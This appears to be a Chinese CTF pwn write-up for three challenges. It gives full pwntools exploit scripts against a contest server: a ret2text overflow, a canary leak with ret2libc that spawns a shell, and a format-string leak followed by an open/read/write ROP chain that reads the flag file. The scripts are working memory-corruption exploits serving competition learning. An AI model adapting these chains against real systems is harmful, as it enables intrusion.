ret2text签到

签到,没什么好说的

1
2
3
4
5
6
7
8
from pwn import *

p=remote(b'xlctf.huhstsec.top',22903)
payload=b'a'*18+p64(0x40115A)

p.send(payload)

p.interactive()

ezlibc

溢出泄露canary+ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
context(log_level='debug')
# p=process('./pwn')

p=remote(b'xlctf.huhstsec.top',24021)
elf=ELF('./pwn')
libc=ELF('/home/yfy/tools/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6')


pay1=b'a'*0x28
p.sendlineafter(b"I think it's easy to get the flag!",pay1)

p.recvuntil(b'a'*0x28)

canary=u64(p.recv(8))-0xa
log.success(f"{hex(canary)}")


puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_rdi=0x400843
ret=0x040059e

offset=0x28

main_addr=0x400764

payload=b'a'*offset+p64(canary)+b'a'*8

payload+=p64(pop_rdi)
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(main_addr)



p.sendlineafter(b'Maybe UR closer to the key',payload)
p.recvuntil(b'keep trying\n')
leak_addr= u64(p.recvline(6).strip().ljust(8,b'\00'))
#leak_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

log.success("leak_addr:{}".format((hex)(leak_addr)))



libc_base=leak_addr-libc.sym['puts']
bin_sh_addr=libc_base+next(libc.search(b'/bin/sh'))
system_addr=libc_base+libc.sym['system']


log.success("libc_base:{}".format((hex)(libc_base)))
log.success("system_addr:{}".format((hex)(system_addr)))
log.success("bin_sh_addr:{}".format((hex)(bin_sh_addr)))
# gdb.attach(p)
# pause()

payload2=b'a'*offset+p64(canary)+b'a'*8
payload2+=p64(ret)+p64(pop_rdi)
payload2+=p64(bin_sh_addr)+p64(system_addr)
p.sendline(payload)
p.sendline(payload2)


p.interactive()

你知道sandbox吗?

正确的libc应该是ubuntu22.04自带的libc

有格式化字符串的漏洞,泄露出libc和canary

接着直接orw就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
p=remote('xlctf.huhstsec.top',24130)
#p=process('./pwn')
elf=ELF('./pwn')
libc=ELF('./libc.so.6')
pay=b'%17$p%39$p'
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]

p.sendlineafter(b'Do you know orw?',pay)

p.recvuntil('0x')

canary=int(p.recv(16),16)
log.success(f"canary>>>{hex(canary)}")

p.recvuntil('0x')
libc_base=int(p.recv(12),16)-0x29e40
log.success(f"libc>>>{hex(libc_base)}")

jmp_rax=0x000000000040114c

bss=0x404060
pop_rsi_r15=0x00000000004014c1
flag=bss+0x100
pop_rdi=0x00000000004014c3 
pop_rdx_rbx=libc_base+0x0000000000090529 
ret=0x40401a

open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr=libc_base + libc.sym["write"]

# gdb.attach(p)
# pause()

payload=b'a'*0x30+p64(canary)*2

#写./flag到bss
payload+=p64(ret)+p64(pop_rsi_r15)+p64(bss)
payload+=p64(0)+ p64(read_addr)

#open
payload+=p64(pop_rdi)+p64(bss)+p64(pop_rsi_r15)
payload+=p64(0)*2 +p64(pop_rdx_rbx)+p64(0)+p64(0)+p64(open_addr)

#read
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi_r15)+p64(flag)+p64(0)
payload+=p64(pop_rdx_rbx)+p64(0x100) + p64(0)+ p64(read_addr)
#打印出flag
payload+=p64(pop_rdi)+ p64(1) +p64(pop_rsi_r15)+p64(flag)+p64(0)
payload+=p64(pop_rdx_rbx)+p64(50)+p64(1)+p64(write_addr)

p.sendafter(b'can you did it?',payload)
p.send(b'./flag\x00')

p.interactive()